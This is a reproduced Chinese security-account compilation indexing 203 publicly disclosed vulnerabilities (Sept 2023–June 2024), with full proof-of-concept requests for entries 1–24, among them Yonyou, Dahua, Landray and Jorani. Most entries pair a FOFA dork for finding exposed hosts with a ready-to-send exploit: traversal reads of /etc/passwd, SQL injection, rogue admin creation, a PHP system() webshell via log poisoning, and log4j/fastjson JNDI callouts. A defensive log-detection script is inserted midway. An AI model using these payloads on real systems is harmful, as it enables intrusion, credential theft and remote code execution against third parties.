Compilation of Publicly Disclosed Internet Vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is reproduced from 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities accounts for a large share of the attacks seen in offensive/defensive exercises, so we hope this article is of some help to defenders. Blue-team members can use its contents to check their own exposure.

Sources: the article covers 203 proof-of-concept (POC) requests for high-impact vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024. All of them were collected from other public accounts or websites and were compiled and published by the 网络安全新视界 team.

Patches: all of the vulnerabilities are already public. Contact the product vendor for patches or remediation guidance.

Content: because of length limits, a few overlong POCs are abbreviated with the placeholder PAYLOAD. Search for the complete POC yourself if you need it.

Rights: if any content infringes a party's lawful rights, contact the 网络安全新视界 team through the account backend and the material will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to receive the full list". This article is the complete list; use the browser's search (F12 / Ctrl+F) to find a keyword.

Bookmark this article if you find it useful, or follow the public account (网络安全新视界).

01 Contents

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user addition
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPTech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController / Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-pass smart management platform 1.0.55.0.0.1 privilege bypass
66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) mobile campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. tosei (Japan) self-service laundry machine RCE
87. DBAppSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAppSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin (奇安信) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 S200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communication command-and-dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command-and-dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command-and-dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command-and-dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command-and-dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass / template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system (PACS) WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. ESAFENET (亿赛通) electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive (阿里云盘) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS dmku SQL injection
201. Founder (方正) omnimedia news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

02 POC List

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user addition
FOFA: title="EasyCVR"

Set password to the MD5 hash of the password you want to use.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor (深信服) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin console with the default account admin, then send the following request.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<sysauth cookie obtained from the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"

------WebKitFormBoundaryxbgjoytz--

9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the double URL encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

The response to the upload contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value from the response is used in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST request. The language parameter traverses into application/logs, so the PHP snippet in the login field is written into the day's log file; the snippet runs the base64-decoded value of a request header through system().
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword

Step 3: send the following request to the target to run the id command. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command (a shell line that runs id 2>&1 between two echo markers).
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

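Added example for defenders (not part of the original compilation and not any vendor's code): a log-triage script for the path-based probes in entries 2, 9, 14, 15 and 20. It decodes nested URL encoding to a fixed point (the entry 9 payload is double-encoded), canonicalizes request paths the way a lenient Java router does (dropping ';' matrix suffixes and resolving '..' segments) so that getAllList;.ico and a.ico/../getAllList both land on the real getAllList endpoint, and flags traversal, file: URLs handed to fetch parameters, and error-based SQL functions. The sensitive-endpoint list and the sample request lines are constructed for the example, not captured traffic.

```python
import re
from typing import Dict, List
from urllib.parse import unquote, urlsplit

# Endpoints worth an alert however they are spelled.  The two listed are the
# ones from entries 14/15 and 20 above (assumption: extend to your own estate).
SENSITIVE_ENDPOINTS = {
    "/jshERP-boot/user/getAllList",
    "/evo-apigw/evo-cirs/file/readPic",
}

TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")
ERROR_BASED_SQLI = re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)
FILE_SCHEME = re.compile(r"(^|[=&])file:", re.I)


def decode_layers(value: str, max_rounds: int = 3) -> str:
    """URL-decode until the text stops changing (bounded).

    Entry 9 sends its payload double URL-encoded, so a single unquote() still
    shows '%27' and defeats a naive SQL pattern.  Decoding to a fixed point
    removes every layer; the bound keeps hostile input from looping us.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def canonical_path(raw_path: str) -> str:
    """Path the back-end router most likely dispatches on.

    Mirrors the lenient matching of common Java web stacks: a ';matrix' suffix
    is dropped from each segment (getAllList;.ico -> getAllList) and '.' / '..'
    segments are resolved (a.ico/../getAllList -> getAllList).
    """
    segments: List[str] = []
    for seg in decode_layers(raw_path).split("/"):
        seg = seg.split(";", 1)[0]
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def analyze_request_line(request_line: str) -> List[str]:
    """Return sorted finding labels for one 'METHOD target HTTP/x' line."""
    try:
        _method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return []
    parts = urlsplit(target)
    decoded_path = decode_layers(parts.path)
    decoded_query = decode_layers(parts.query)
    findings = set()

    if TRAVERSAL.search(decoded_path) or TRAVERSAL.search(decoded_query):
        findings.add("traversal")
    canon = canonical_path(parts.path)
    if canon in SENSITIVE_ENDPOINTS:
        findings.add(f"sensitive-endpoint:{canon}")
        if canon != decoded_path:
            findings.add("path-confusion")   # reached via ;suffix or /../ rather than its real name
    if ERROR_BASED_SQLI.search(decoded_query):
        findings.add("error-based-sqli")
    if FILE_SCHEME.search(decoded_query):
        findings.add("file-scheme")          # file:/etc/passwd fed to a URL-fetching parameter
    return sorted(findings)


def scan(request_lines) -> Dict[str, List[str]]:
    """Map each request line that produced at least one finding to its findings."""
    report: Dict[str, List[str]] = {}
    for line in request_lines:
        found = analyze_request_line(line)
        if found:
            report[line] = found
    return report


# Constructed sample request lines modelled on entries 2, 9, 14, 15 and 20
# (not captured traffic); the last line is a benign control.
SAMPLE_REQUESTS = [
    "GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1",
    "GET /search/index.php?keyword=%2527%2520and%2520(extractvalue(1%252Cconcat"
    "(0x7e%252C(select%2520user())%252C0x7e)))%2523 HTTP/1.1",
    "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1",
    "GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1",
    "GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1",
    "GET /index.html HTTP/1.1",
]

if __name__ == "__main__":
    for line, found in scan(SAMPLE_REQUESTS).items():
        print(f"{', '.join(found):60} {line}")
```

Feed it the request-line column of your access logs; a "path-confusion" hit against an endpoint you believed was blocked by a path-prefix rule on a WAF or reverse proxy is the finding to chase first, because it shows the front end and the application disagree on what the path is.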
16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a database function (SQL Server HASHBYTES) that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
  "loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://DNSLOG"}
  }""
}

24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

